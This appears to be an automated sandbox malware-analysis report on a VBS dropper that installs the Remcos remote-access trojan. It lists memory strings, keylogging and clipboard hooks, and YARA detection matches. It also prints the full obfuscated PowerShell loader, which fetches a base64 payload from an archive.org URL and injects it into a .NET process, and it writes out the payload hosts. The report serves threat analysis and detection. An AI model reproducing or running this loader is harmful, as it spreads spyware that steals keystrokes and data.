            Source: powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090E2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ia600100.us.archive.org
            Source: powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2311160926.000001FE959C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B08F731000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2311160926.000001FE9597A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2311160926.000001FE95994000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B08F731000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.2253846406.000001B0907A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.arX
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtc9I;k8fbase64Content
            Source: powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FB8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FB8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/WksSo/0
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000,7_2_0040A2B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,7_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004168C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,7_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,7_2_0040A3E0

            E-Banking Fraud

            Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR
            Source: Yara match | File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041C9E2 SystemParametersInfoW,7_2_0041C9E2

System Summary

Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2784, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,7_2_004167B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD347625FA 2_2_00007FFD347625FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD347629FA 2_2_00007FFD347629FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD347616C9 2_2_00007FFD347616C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD347725FA 4_2_00007FFD347725FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD347718FD 4_2_00007FFD347718FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD3477509B 4_2_00007FFD3477509B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD347728D3 4_2_00007FFD347728D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD3478140D 4_2_00007FFD3478140D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD34781F31 4_2_00007FFD34781F31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0043E0CC 7_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041F0FA 7_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00454159 7_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00438168 7_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004461F0 7_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0043E2FB 7_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0045332B 7_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0042739D 7_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004374E6 7_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0043E558 7_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00438770 7_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_004378FE 7_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00433946 7_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0044D9C9 7_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00427A46 7_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041DB62 7_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00427BAF 7_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00437D33 7_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00435E5E 7_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00426E0E 7_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0043DE9D 7_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00413FCA 7_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00436FEA 7_2_00436FEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00401E65 appears 34 times
Source: sostener.vbs | Initial sample: Strings found which are bigger than 50
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2784, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@12/6@11/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_00417952
